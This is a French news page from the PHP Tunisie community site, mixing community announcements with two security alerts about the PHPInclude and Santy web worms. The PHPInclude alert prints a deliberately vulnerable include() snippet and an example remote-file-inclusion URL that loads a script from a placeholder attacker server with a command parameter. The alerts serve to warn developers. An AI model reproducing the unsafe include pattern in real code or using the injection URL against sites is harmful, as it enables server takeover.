Inscription
Vous n'êtes pas encore membres de PHP Tunisie ? Inscrivez vous dès aujourd'hui.
Nouvelle inscription
Mot de passe
Vous avez oublié votre mot de passe ? .
Nouveau mot de passe
2ème édition du concours de programmation international TopDev
Ajouté le : 2006-01-07 06:54:41
Premier meeting en ligne des communautés PHP arabes
Ajouté le : 2006-01-05 03:51:15
Grand Meeting entre les actifs de l'open-source en Tunisie
Ajouté le : 2005-11-26 00:33:51
Forum PHP, Paris 2005
Ajouté le : 2005-09-23 14:37:53
VoiceXML PHP framework Version 2.0 beta2
Ajouté le : 2005-09-11 15:41:35
Green Orange Framework
Ajouté le : 2005-08-29 04:24:57
Toute les actualités de PHP Tunisie
Nouvelle alerte de sécurité PHPInclude.Worm
Ajouté le : 2004-12-27 09:40:05 | Ajouter un commentaireAprès la détection d'autres moutures du WebWorm Sarty, un nouveau webworm vient d'être détecté de la même famille mais qui profite d'un autre bug qui semble couvrir une gamme plus large de scripts PHP.
Le nouveau worm se prénomme PHPInclude.Worm et qui comme son nom l'indique profite de bugs issuent d'une mauvaise utilisation de include dans des scripts PHP.
Ce Worm peut être détecté par certain antivirus comme étant une version C ou e de Santy, simplement la seule similitude avec Santy c'est l'utilisation de moteur de recherche pour trouver des victimes.
Les sites web à risque
PhpInclude.Worm profite de bugs issuent d'une mauvaise utilisation des fonctions includ e et require, qui peuvent quand les variables ne sont pas protégées permettre l'inclusion de fichier externes.
Par exemple
-------- Exemple : vulnerable.php --------
if(isset($page))
{
include($page);
}
-----------------------------------------------La page ci-dessus ne filtre pas correctement la variable $page, elle permet donc l'inclusion puis l'exécution de scripts arbitraires distants :
vulnerable.php?page=http://server_pirate/scriptmalicieux? cmd=commandes_malicieuses
PhpInclude.Worm recherche donc des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies.
Ces failles courantes sont liées aux applications web et non pas à la plateforme ou à la version de PHP, d'où un risque qualifié d'Elevé.
Mise à jour de sécurité de PHP - un Worm se propage
Ajouté le : 2004-12-21 22:30:00 | Ajouter un commentaireLa nouvelle génération de Worm "WebWorm" s'est propagé récement en profitant d'une faille de sécurité dans PHP.
Le Worm se prénomme Santy (alias Net-Worm.Perl.Santy.a) développé en perl, il attaque les serveurs web et essentiellement les sites qui utilisent le forum PHPBB.Santy utilise Google pour trouver ses victimes et d'autres hosts pour l'héberger en même temps !
Le Worm écrase plusieurs fichiers .htm .php .asp .shtm .jsp .phtm et remplace par ce messageThis site is defaced!!!
NeverEverNoSanity WebWorm generation XX augmente selon la propagation du worm ! Le nombre de victimes possible est inconnu mais google retourne plus qu'un million !
Des recommandations dans le site de PHPBB sont disponible pour mettre à jour le forum et éviter ce worm :
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t...La nouvelle sur PHPBB
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t...La nouvelle sur netcraft :
http://news.netcraft.com/archives/2004/12/18/ph...La nouvelle sur Insecure.org
http://seclists.org/lists/bugtraq/2004/Dec/0220...
Encore du nouveau sur phptunisie.net !
Ajouté le : 2004-12-16 14:10:00 | Ajouter un commentaireEncore du nouveau dans le site !
Quelques nouvelles modifications ont été introduites encore sur le site. On espère avoir tout tester, cependant l'apparition de bugs reste valable le temps d'automatiser plusieurs fonctionnalités du site web. Les fenêtres d'aides ont disparues pour quelques temps aussi.
Deux grandes nouveautés ont été ajoutées. Sans le support des membres, le projet PHP Tunisie n'aurai pas pu voir le jour. Pour cette raison et pour améliorer l'utilisation du site web et le confort des membres nous avons autoriser les membres à activer ou non les bannières publicitaires. Vos remarques et suggestions pour améliorer ce service sont toujours les bienvenues, et votre support est très important pour améliorer nos services et vous offrir à la communauté un contenu beaucoup plus riche !
Vous pouvez aussi activer ou désactiver la notification par email de la newsletter. Un email qui est envoyé mensuellement pour annoncer la sortie d'une nouvelle édition du PHP Tunisie magazine. Vous pouvez accéder à ces deux fonctions en modifiant vos infos.
La seconde grande nouveauté est les raccourcis des tâches en cours sur la page de membres. Vous pouvez bien sur participer à la réalisation des projets sans ajouter aux favoris, mais l'ajout aux favoris vous donne ce raccourci qui vous facilite l'accès aux tâches en cours.
D'autres modifications ont été ajoutés pour préparer le site à accueillir de nouvelles fonctionnalitées qui seront annoncées bientôt.
Les projets phptunisie et les commentaires sur les actualités
Ajouté le : 2004-12-10 07:50:00 | Ajouter un commentaireCertainement plusieurs fonctionnalités n'ont pas pu voir le jour vu la disponibilité des membres et le nombre de travaux à réaliser. Mais ceci n'empêche qu'on essaye toujours d'ajouter ces fonctionnalités au fur et à mesure pour mieux avancer dans la réalisation des objectifs de la communauté.
Les nouvelles fonctionnalités qui ont été mises à jour sont surtout le gestionnaire des tâches des projets PHP Tunisie. Les statistiques ont été activées pour pouvoir visualiser l'avancement des travaux ainsi que d'avoir une idée sur certains aspects autour de la réalisation du projet.
Une nouvelle fonctionnalité viens d'être ajoutée et qui permet d'ajouter les commentaires sur les actualités de PHP Tunisie et celles de PHP dans le monde. Ces commentaires sont disponibles uniquement pour les membres de la communauté.
PHP Tunisie Magazine, édition novembre 2004
Ajouté le : 2004-11-21 16:55:00 | Ajouter un commentaireL'édition de novembre 2004 de PHP Tunisie Magazine sera bientôt disponible en téléchargement ! Avec dans cette édition 35 pages d'articles et d'actualités, dans un dossier Spécial VoiceXML et PHP :
Les dernières nouveautés
Les webservices avec PHP
VoiceXML Plus simplement en PHP
Du VoiceXML Dynamique pour l'entreprise
Trucs et Astuces D'autres surprises sont à découvrir.
Ajouté le : 2004-11-10 05:36:00 | Ajouter un commentaireA la demande de l'équipe de PHP Tunisie et pour fêter la sortie de FireFox 1.0 dans une soirée ramadanesque. Le rendez vous a été fixé aujourd'hui à 20H à l'étoile du Nord, Tunis.
Merci de confirmer votre présence ou laisser un message dans le forum de PHP Tunisie.
De la Téléphonie avec PHP : PHP Voice
Ajouté le : 2004-11-04 07:12:00 | Ajouter un commentaireUn projet qui a commencé en 2002, avec au départ une seule classe PHP pour le VoiceXML, aujourd'hui PHP
Voice présente un ensemble de bibliothèques pour le développement d'applications de téléphonie avec PHP
et supporte les standards : VXML, SSML, CCXML et SRGS.
Les déveoppeurs PHP intéressés pour participer à ce projet peuvent joindre l'équipe de développement de
PHP Voice en envoyant un email à info at phptunisie dot net.
La dernière version des packages est disponible sur le CVS de sourceforge :
cvs -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/vxml login
cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/vxml co phpvoice
Ajouter aux favoris et les nouveautées PHPTunisie
Ajouté le : 2004-10-10 14:00:00 | Ajouter un commentaireUne nouvelle fonctionnalité vient d'être intégrée au site pour ajouter aux favoris vos meilleurs projets.
Depuis le lancement de PHP Tunisie, un grand nombre de projets ont été proposés à la réalisation, et ont été soumis aux votes. Actuellement à la tête de la liste le projet du Broker Automatique proposé par Mohamed Nejib Bejar avec 11 votes et un score de 7.18/10, à la suite SQLite Frontend, Calcul des distances entre villes TN avec le code postal et Kamouss en égalité avec 7 votes et un score de 7.57/10
Si vous n'avez pas encore voter pour les projets merci d'ajouter votre voix pour départager, sinon on procédera par ordre de date d'ajout. Et mensuellement le projet qui sera en tête de la liste passera à la phase de réalisation.
Le module de développement permettra le travail en collaboration entre les membres pour la réalisation des projets. Avec un système de gestion de tâches, de bugs, de téléchargements, de statistiques, groupe de discussion ... etc.
Mambo Server choisit MySQL Backup Pro
Ajouté le : 2004-09-08 09:53:00 | Ajouter un commentaireMamboServer, logiciel élu meilleur projet de logiciel libre dans le Linux Format Awards 2004, a choisit MySQL Backup Pro comme remplacement à leur solution actuelle de backup/restore.
Site officiel Mambo
http://mamboserver.com/
Les groupes de discussion PHP Tunisie enfin disponible
Ajouté le : 2004-09-01 07:20:00 | Ajouter un commentaireLes vacances se terminent avec deux nouvelles, la première nouvelle c'est que le forum de PHP Tunisie est finalement disponible, veuillez lire le premier post de bienvenue pour les détails de fonctionnement.
La seconde nouvelle concerne le magazine PHP Tunisie, l'édition de septembre sera disponible d'ici la semaine prochaine. Avec certainement des articles divers et toujours les meilleures nouveautés.
Les conditions Générales d'utilisation de PHP Tunisie ont été mises à jour, merci de consulter la rubrique FAQ pour de plus amples détails.
| Précédente | 1 2 3 4 5 6 | Suivante |